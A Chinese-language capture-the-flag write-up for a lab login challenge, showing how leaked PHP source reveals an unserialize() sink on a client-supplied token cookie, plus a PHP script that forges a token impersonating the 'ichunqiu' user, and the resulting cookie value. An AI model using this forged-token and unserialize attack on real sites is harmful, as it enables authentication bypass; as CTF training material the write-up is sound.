
[春秋云实企安殿]Login

在页面源代码中拿到账号密码:test1/test1

http://cdn.wutongliran.top/img/image-20240309163918215.png

登录后来到这里

http://cdn.wutongliran.top/img/image-20240309164000471.png

查看数据包,看到返回包中有可疑参数 show

http://cdn.wutongliran.top/img/image-20240309164236738.png

重新发送数据包,在请求头里添上show:1,得到 member.php 的后端源码

http://cdn.wutongliran.top/img/image-20240309164510162.png

<?php
	// Pulls in the shared setup this script relies on (DB connection, session,
	// $flag are presumably defined there — contents not visible in this listing).
	include 'common.php';
	// One merged request bag. array_merge lets later arrays overwrite earlier
	// string keys, so a $_COOKIE entry wins over a same-named $_SESSION entry:
	// client-supplied input can shadow server-side session state. Note the
	// variable is spelled $requset consistently throughout this file.
	$requset = array_merge($_GET, $_POST, $_SESSION, $_COOKIE);
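	/**
	 * Thin wrapper over the legacy mysql_* API for the `user` table.
	 *
	 * Security note: __wakeup() fires during unserialize(). If a serialized db
	 * object with a non-empty $where reaches unserialize(), that raw clause is
	 * executed without any escaping — a deserialization-to-SQL-injection gadget.
	 * Serialized data from the client must therefore never reach unserialize().
	 */
	class db
	{
		/** @var string|null Raw SQL WHERE fragment; callers must escape what they put in. */
		public $where;

		/**
		 * Runs the query held in $where when an instance is deserialized.
		 * Invoked automatically by unserialize(); nothing escapes $where here.
		 */
		public function __wakeup()
		{
			if (!empty($this->where)) {
				$this->select($this->where);
			}
		}

		/**
		 * Fetches the first `user` row matching an already-escaped WHERE fragment.
		 *
		 * @param string $where SQL fragment appended verbatim after "where".
		 * @return array|false|null First row; false when there is no row;
		 *                          null when the query itself fails.
		 */
		public function select($where)
		{
			// $where is concatenated into the statement: mysql_* offers no prepared
			// statements, so every value in it must be escaped by the caller.
			$sql = mysql_query('select * from user where ' . $where);
			if ($sql === false) {
				// Query failed: say so explicitly rather than @-suppressing the
				// warning mysql_fetch_array() would raise on a non-resource.
				return null;
			}
			return mysql_fetch_array($sql);
		}
	}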

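	if (isset($requset['token'])) {
		// SECURITY: the token is entirely client-controlled (it can arrive via
		// query string, POST body or cookie) and is handed to unserialize(). That
		// lets a client instantiate any class defined in this file — including db,
		// whose __wakeup() runs a query. Decoding the token with json_decode()
		// instead would remove this sink; it is flagged rather than replaced here
		// because the login flow depends on the serialized format.
		$decoded = gzuncompress(base64_decode($requset['token']));
		$login = $decoded === false ? false : unserialize($decoded);
		if (!is_array($login)) {
			// Undecodable token: treat it like a missing token instead of reading
			// offsets from false/null below.
			header('Location: index.php?error=1');
			exit;
		}

		$db = new db();
		// The value is escaped here, but note that select() itself does no escaping.
		$user = isset($login['user']) ? $login['user'] : '';
		$row = $db->select('user=\'' . mysql_real_escape_string($user) . '\'');

		if ($user === 'ichunqiu') {
			// Identity is taken from the client's token and checked BEFORE the
			// password — anyone who serializes user=ichunqiu gets the flag.
			// $flag is presumably defined in common.php.
			echo $flag;
		} elseif (!is_array($row) || !isset($login['pass']) || $row['pass'] !== $login['pass']) {
			// A missing row or a missing 'pass' key is a failed login; previously
			// null !== null evaluated to false and counted as a match.
			echo 'unserialize injection!!';
		} else {
			echo "(╯‵□′)╯︵┴─┴ ";
		}
	} else {
		header('Location: index.php?error=1');
		// Stop here so nothing after the redirect header is executed.
		exit;
	}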
?>

想要输出 flag ,需要注意以下代码

if(isset($requset['token']))
	{
		$login = unserialize(gzuncompress(base64_decode($requset['token'])));
		if($login['user'] === 'ichunqiu')
		{
			echo $flag;
		}

exp

<?php
// Produces the token member.php expects: a serialized array, zlib-compressed,
// then base64-encoded — the exact reverse of the server's decode chain.
// Only the 'user' key is set, because member.php checks that key first.
$a = ['user' => 'ichunqiu'];
$a = serialize($a);
$a = gzcompress($a);
$a = base64_encode($a);
echo $a;
?>
//运行得到 eJxLtDK0qi62MrFSKi1OLVKyLraysFLKTM4ozSvMLFWyrgUAo4oKXA==

在 cookie 里加上token=eJxLtDK0qi62MrFSKi1OLVKyLraysFLKTM4ozSvMLFWyrgUAo4oKXA==

http://cdn.wutongliran.top/img/image-20240309171939066.png